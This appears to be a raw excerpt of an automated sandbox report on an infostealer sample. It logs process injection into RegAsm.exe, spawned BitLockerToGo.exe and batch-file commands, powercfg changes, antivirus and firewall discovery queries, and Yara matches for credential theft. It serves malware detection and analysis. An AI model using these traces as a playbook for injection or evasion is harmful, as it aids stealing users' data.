Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63E000
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B09008
Source: C:\Users\user\Desktop\FileApp.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process created: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe "C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe"
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Command Command.bat & Command.bat & exit
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5644 -ip 5644
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 824
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userFBKKJEBFID.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userEHJKFCGHID.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process created: unknown unknown
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process created: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe "C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe"
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process created: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe "C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69D04760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 22_2_69D04760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69BE1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint, 22_2_69BE1C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0053D8FE cpuid 2_2_0053D8FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 22_2_00417630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\FileApp.exe Queries volume information: C:\Users\user\Desktop\FileApp.exe VolumeInformation
Source: C:\Users\user\Desktop\FileApp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Queries volume information: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Queries volume information: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Queries volume information: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Queries volume information: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Queries volume information: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Queries volume information: C:\Windows VolumeInformation
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Queries volume information: C:\Windows\AppReadiness VolumeInformation
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Queries volume information: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Queries volume information: C:\Windows VolumeInformation
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Queries volume information: C:\Windows\AppReadiness VolumeInformation
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Queries volume information: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Queries volume information: C:\ProgramData\jewkkwnf\jewkkwnf.exe VolumeInformation
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Queries volume information: C:\ProgramData\jewkkwnf\jewkkwnf.exe VolumeInformation
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Queries volume information: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe VolumeInformation
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00417420 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA, 22_2_00417420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_004172F0 GetProcessHeap,HeapAlloc,GetUserNameA, 22_2_004172F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_004174D0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 22_2_004174D0
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Code function: 14_2_0040681B GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 14_2_0040681B
Source: C:\Users\user\Desktop\FileApp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: ZYgCMtJP3wxddinn5Sa3IKJH.exe, 00000005.00000002.2417773701.0000000001211000.00000004.00000020.00020000.00000000.sdmp, xNc0eiwaHinah8TaPUA3TuXZ.exe, 00000008.00000002.2414470281.0000000000591000.00000004.00000020.00020000.00000000.sdmp, DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2427779581.0000000001542000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avp.exe
Source: ZYgCMtJP3wxddinn5Sa3IKJH.exe, 00000005.00000002.2417773701.0000000001211000.00000004.00000020.00020000.00000000.sdmp, xNc0eiwaHinah8TaPUA3TuXZ.exe, 00000008.00000002.2414470281.0000000000591000.00000004.00000020.00020000.00000000.sdmp, DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2427779581.0000000001542000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AVP.exe
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.24ec000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.uht_7KlzJBHoKg010MzYxndX.exe.1a50000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.uht_7KlzJBHoKg010MzYxndX.exe.1b50000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.24ec000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.uht_7KlzJBHoKg010MzYxndX.exe.1b50000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.2380000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.2380000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.uht_7KlzJBHoKg010MzYxndX.exe.1a50000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000025.00000002.2651621798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2703817640.0000000002060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2767261547.00000000024EC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2733299099.0000000001A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2610045392.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2656601610.00000000018EC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.2458059761.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2594491331.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 8.2.xNc0eiwaHinah8TaPUA3TuXZ.exe.33c5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.xNc0eiwaHinah8TaPUA3TuXZ.exe.33c5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2611175093.00000000033C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2847715040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: xNc0eiwaHinah8TaPUA3TuXZ.exe PID: 4072, type: MEMORYSTR
Source: Yara match File source: 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.3044658256.000000000108A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: kPy9KuGWnhtidoY4IdmVbiaT.exe PID: 3048, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 25.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.DSN_5xuwaC5nkP_MHzd7lLTl.exe.4295570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.DSN_5xuwaC5nkP_MHzd7lLTl.exe.4295570.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.3234197718.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DSN_5xuwaC5nkP_MHzd7lLTl.exe PID: 7060, type: MEMORYSTR
Source: Yara match File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.unpack, type: UNPACKEDPE
